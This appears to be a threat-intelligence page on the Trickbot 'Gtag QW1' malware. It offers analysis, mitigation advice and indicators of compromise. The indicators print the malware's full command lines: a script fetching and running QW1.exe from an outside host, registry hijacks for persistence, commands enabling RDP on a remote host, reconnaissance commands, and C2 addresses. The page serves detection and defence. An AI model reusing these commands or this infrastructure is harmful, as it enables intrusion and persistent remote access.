Trickbot Gtag QW1
%WINDIR%\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\DiskDrive\1\Volume\BackFiles\Jofert.exe powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Jofert.exe' %WINDIR%\system32\cmd[.]exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f %WINDIR%\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f "%WINDIR%\system32\cmd[.]exe" /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe "%WINDIR%\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f %WINDIR%\system32\cmd[.]exe /C reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f %WINDIR%\system32\cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
AI Analysis
Technical Summary
The Trickbot Gtag QW1 is a malware variant associated with the Trickbot family, known for its modular banking Trojan capabilities and use in multi-stage attack campaigns. The provided command sequence indicates that the malware executes a batch script (errorfix.bat) and VBScript (pinumber.vbs) from a local disk path, followed by downloading and executing an external payload (QW1.exe) from a suspicious URL. It also runs a secondary executable (Jofert.exe) via PowerShell with a delay, suggesting staged execution to evade detection. The malware manipulates Windows Registry keys under HKEY_CURRENT_USER\Software\Classes to hijack the AppX protocol handler, setting the 'DelegateExecute' value to an empty string and modifying the shell open command to launch a suspicious executable located in the All Users profile directory with a non-ASCII filename. This technique is indicative of persistence and execution hijacking to maintain foothold and evade user detection. Additionally, the malware modifies the Terminal Server registry key (fDenyTSConnections) to 0, effectively enabling Remote Desktop Protocol (RDP) connections, which could facilitate lateral movement or remote access by attackers. The use of WMIC commands querying installed antivirus products suggests reconnaissance to identify security software presence, potentially to disable or evade them. The malware does not have an associated patch or known exploits in the wild, and its severity is currently rated low by the source. However, the presence of Cobalt Strike beacon tags indicates that this malware may be used as a delivery mechanism for advanced post-exploitation frameworks, increasing its threat potential. Overall, Trickbot Gtag QW1 employs multiple persistence, execution hijacking, and reconnaissance techniques to establish and maintain access on compromised Windows systems.
Potential Impact
For European organizations, Trickbot Gtag QW1 poses a significant risk primarily through its capability to establish persistent access and enable remote control via RDP. This can lead to unauthorized data access, lateral movement within networks, and potential deployment of additional payloads such as ransomware or information stealers. The malware’s ability to disable or evade antivirus detection increases the likelihood of prolonged undetected presence, which can compromise confidentiality and integrity of sensitive data. Organizations with exposed RDP services or insufficient endpoint protection are particularly vulnerable. The manipulation of registry keys and use of obscure filenames complicate detection and remediation efforts. Given Trickbot’s historical use in financially motivated attacks and espionage, sectors such as finance, critical infrastructure, and government entities in Europe could face targeted attacks resulting in data breaches, operational disruption, and financial losses. The malware’s low initial severity rating may underestimate its potential as a foothold for more damaging follow-on attacks, especially in environments lacking robust monitoring and incident response capabilities.
Mitigation Recommendations
1. Restrict and monitor RDP access: Disable unnecessary RDP services or restrict them via VPNs and strong authentication mechanisms such as multi-factor authentication (MFA). 2. Implement application whitelisting to prevent execution of unauthorized scripts and executables, particularly those launched from unusual directories or with non-standard filenames. 3. Monitor and alert on suspicious registry modifications, especially under HKEY_CURRENT_USER\Software\Classes and Terminal Server keys, to detect persistence and remote access enabling attempts. 4. Employ endpoint detection and response (EDR) solutions capable of behavioral analysis to identify staged execution patterns and PowerShell abuse. 5. Conduct regular threat hunting for indicators of Trickbot activity, including unusual network connections to known command and control domains or IPs. 6. Harden systems by disabling legacy scripting hosts (e.g., cscript) where not required and restricting execution of scripts from user directories. 7. Maintain up-to-date threat intelligence feeds to identify emerging Trickbot variants and associated infrastructure. 8. Educate users on phishing and social engineering tactics commonly used to deliver Trickbot payloads, as initial infection vectors often involve user interaction. 9. Segment networks to limit lateral movement opportunities if compromise occurs. 10. Regularly back up critical data and verify recovery procedures to mitigate impact of potential ransomware deployment following Trickbot infection.
Affected Countries
Germany, United Kingdom, France, Italy, Netherlands, Poland, Spain, Belgium
Indicators of Compromise
- text: %WINDIR%\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat
- text: cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\DiskDrive\1\Volume\BackFiles\Jofert.exe
- text: powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Jofert.exe'
- text: %WINDIR%\system32\cmd[.]exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
- text: %WINDIR%\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f
- text: reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f
- text: reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
- text: "%WINDIR%\system32\cmd[.]exe" /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe
- text: cmd.exe /c net config workstation
- text: cmd.exe /c ipconfig /all
- text: cmd.exe /c net view /all
- text: cmd.exe /c net view /all /domain
- text: cmd.exe /c nltest /domain_trusts /all_trusts
- text: "%WINDIR%\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- text: %WINDIR%\system32\cmd[.]exe /C reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- text: reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- text: %WINDIR%\system32\cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
- text: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
- ip: 95.179.210.8
- ip: 50.87.170.67
- url: https://serviceuphelper.com:80/avxbDFb
- url: http://customscripts.us/QW1.exe
- domain: customscripts.us
- domain: serviceuphelper.com
- url: http://64.44.133.131/images/cursor.png
- link: https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/
- malware-sample: Jofert.exe|b17e4833c580bbd343a1834be0e2a65f
- file: Jofert.exe
- hash: b17e4833c580bbd343a1834be0e2a65f
- hash: 7ad2d4c4fe0efd021992391fcdb7e630a19f23f6
- hash: 5770d351522695562143fbf5d6381cb7c13151e3d3e1cdc923759bc60e025bbe
- size-in-bytes: 385024
- malware-sample: errorfix.bat|4368db27ef2f07171c2c13d2e537d459
- file: errorfix.bat
- hash: 4368db27ef2f07171c2c13d2e537d459
- hash: 7993ebdea9421a85b431077b2d89ee3344180759
- hash: 17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a
- size-in-bytes: 2864
- malware-sample: invoice.doc|d627615f955dd5342ef6b4c6938ad98c
- file: invoice.doc
- hash: d627615f955dd5342ef6b4c6938ad98c
- hash: 645467b3207a50c43be075a0b81308a5f6935c59
- hash: 1a508909a8ef020ab5285ce47106beac317c2ae0d2971eff9a4f95a5079eee7f
- size-in-bytes: 441560
Trickbot Gtag QW1
Description
%WINDIR%\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\DiskDrive\1\Volume\BackFiles\Jofert.exe powershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Jofert.exe' %WINDIR%\system32\cmd[.]exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f %WINDIR%\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f "%WINDIR%\system32\cmd[.]exe" /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe "%WINDIR%\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f %WINDIR%\system32\cmd[.]exe /C reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f %WINDIR%\system32\cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
AI-Powered Analysis
Technical Analysis
The Trickbot Gtag QW1 is a malware variant associated with the Trickbot family, known for its modular banking Trojan capabilities and use in multi-stage attack campaigns. The provided command sequence indicates that the malware executes a batch script (errorfix.bat) and VBScript (pinumber.vbs) from a local disk path, followed by downloading and executing an external payload (QW1.exe) from a suspicious URL. It also runs a secondary executable (Jofert.exe) via PowerShell with a delay, suggesting staged execution to evade detection. The malware manipulates Windows Registry keys under HKEY_CURRENT_USER\Software\Classes to hijack the AppX protocol handler, setting the 'DelegateExecute' value to an empty string and modifying the shell open command to launch a suspicious executable located in the All Users profile directory with a non-ASCII filename. This technique is indicative of persistence and execution hijacking to maintain foothold and evade user detection. Additionally, the malware modifies the Terminal Server registry key (fDenyTSConnections) to 0, effectively enabling Remote Desktop Protocol (RDP) connections, which could facilitate lateral movement or remote access by attackers. The use of WMIC commands querying installed antivirus products suggests reconnaissance to identify security software presence, potentially to disable or evade them. The malware does not have an associated patch or known exploits in the wild, and its severity is currently rated low by the source. However, the presence of Cobalt Strike beacon tags indicates that this malware may be used as a delivery mechanism for advanced post-exploitation frameworks, increasing its threat potential. Overall, Trickbot Gtag QW1 employs multiple persistence, execution hijacking, and reconnaissance techniques to establish and maintain access on compromised Windows systems.
Potential Impact
For European organizations, Trickbot Gtag QW1 poses a significant risk primarily through its capability to establish persistent access and enable remote control via RDP. This can lead to unauthorized data access, lateral movement within networks, and potential deployment of additional payloads such as ransomware or information stealers. The malware’s ability to disable or evade antivirus detection increases the likelihood of prolonged undetected presence, which can compromise confidentiality and integrity of sensitive data. Organizations with exposed RDP services or insufficient endpoint protection are particularly vulnerable. The manipulation of registry keys and use of obscure filenames complicate detection and remediation efforts. Given Trickbot’s historical use in financially motivated attacks and espionage, sectors such as finance, critical infrastructure, and government entities in Europe could face targeted attacks resulting in data breaches, operational disruption, and financial losses. The malware’s low initial severity rating may underestimate its potential as a foothold for more damaging follow-on attacks, especially in environments lacking robust monitoring and incident response capabilities.
Mitigation Recommendations
1. Restrict and monitor RDP access: Disable unnecessary RDP services or restrict them via VPNs and strong authentication mechanisms such as multi-factor authentication (MFA). 2. Implement application whitelisting to prevent execution of unauthorized scripts and executables, particularly those launched from unusual directories or with non-standard filenames. 3. Monitor and alert on suspicious registry modifications, especially under HKEY_CURRENT_USER\Software\Classes and Terminal Server keys, to detect persistence and remote access enabling attempts. 4. Employ endpoint detection and response (EDR) solutions capable of behavioral analysis to identify staged execution patterns and PowerShell abuse. 5. Conduct regular threat hunting for indicators of Trickbot activity, including unusual network connections to known command and control domains or IPs. 6. Harden systems by disabling legacy scripting hosts (e.g., cscript) where not required and restricting execution of scripts from user directories. 7. Maintain up-to-date threat intelligence feeds to identify emerging Trickbot variants and associated infrastructure. 8. Educate users on phishing and social engineering tactics commonly used to deliver Trickbot payloads, as initial infection vectors often involve user interaction. 9. Segment networks to limit lateral movement opportunities if compromise occurs. 10. Regularly back up critical data and verify recovery procedures to mitigate impact of potential ransomware deployment following Trickbot infection.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Threat Level
- 3
- Analysis
- 0
- Uuid
- 5e6793ed-2868-4474-a485-42210a0a020f
- Original Timestamp
- 1621850731
Indicators of Compromise
Text
| Value | Description | Copy |
|---|---|---|
text%WINDIR%\system32\cmd.exe /c C:\DiskDrive\1\Volume\errorfix.bat | — | |
textcscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\DiskDrive\1\Volume\BackFiles\Jofert.exe | — | |
textpowershell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Jofert.exe' | — | |
text%WINDIR%\system32\cmd[.]exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f | — | |
text%WINDIR%\system32\cmd.exe /C reg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f | — | |
textreg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /t REG_SZ /d "%WINDIR%\system32\cmd.exe /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe" /f | — | |
textreg add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f | — | |
text"%WINDIR%\system32\cmd[.]exe" /c start %ALLUSERSPROFILE%\ì˜ìƒØ«Ø§Ùوزبت.exe | — | |
textcmd.exe /c net config workstation | — | |
textcmd.exe /c ipconfig /all | — | |
textcmd.exe /c net view /all | — | |
textcmd.exe /c net view /all /domain | — | |
textcmd.exe /c nltest /domain_trusts /all_trusts | — | |
text"%WINDIR%\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | — | |
text%WINDIR%\system32\cmd[.]exe /C reg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | — | |
textreg add "\\usha-bdc\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | — | |
text%WINDIR%\system32\cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | — | |
textWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | — |
Ip
| Value | Description | Copy |
|---|---|---|
ip95.179.210.8 | — | |
ip50.87.170.67 | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttps://serviceuphelper.com:80/avxbDFb | — | |
urlhttp://customscripts.us/QW1.exe | — | |
urlhttp://64.44.133.131/images/cursor.png | — |
Domain
| Value | Description | Copy |
|---|---|---|
domaincustomscripts.us | — | |
domainserviceuphelper.com | — |
Link
| Value | Description | Copy |
|---|---|---|
linkhttps://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/ | — |
Malware sample
| Value | Description | Copy |
|---|---|---|
malware-sampleJofert.exe|b17e4833c580bbd343a1834be0e2a65f | — | |
malware-sampleerrorfix.bat|4368db27ef2f07171c2c13d2e537d459 | — | |
malware-sampleinvoice.doc|d627615f955dd5342ef6b4c6938ad98c | — |
File
| Value | Description | Copy |
|---|---|---|
fileJofert.exe | — | |
fileerrorfix.bat | — | |
fileinvoice.doc | — |
Hash
| Value | Description | Copy |
|---|---|---|
hashb17e4833c580bbd343a1834be0e2a65f | — | |
hash7ad2d4c4fe0efd021992391fcdb7e630a19f23f6 | — | |
hash5770d351522695562143fbf5d6381cb7c13151e3d3e1cdc923759bc60e025bbe | — | |
hash4368db27ef2f07171c2c13d2e537d459 | — | |
hash7993ebdea9421a85b431077b2d89ee3344180759 | — | |
hash17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a | — | |
hashd627615f955dd5342ef6b4c6938ad98c | — | |
hash645467b3207a50c43be075a0b81308a5f6935c59 | — | |
hash1a508909a8ef020ab5285ce47106beac317c2ae0d2971eff9a4f95a5079eee7f | — |
Size in-bytes
| Value | Description | Copy |
|---|---|---|
size-in-bytes385024 | — | |
size-in-bytes2864 | — | |
size-in-bytes441560 | — |
Threat ID: 682c7adfe3e6de8ceb7795ae
Added to database: 5/20/2025, 12:51:43 PM
Last enriched: 6/19/2025, 2:19:49 PM
Last updated: 7/31/2025, 12:25:54 PM
Views: 9
Related Threats
ThreatFox IOCs for 2025-08-15
MediumThreat Actor Profile: Interlock Ransomware
MediumBuilding a Free Library for Phishing & Security Awareness Training — Looking for Feedback!
LowCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks
MediumThreatFox IOCs for 2025-08-14
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.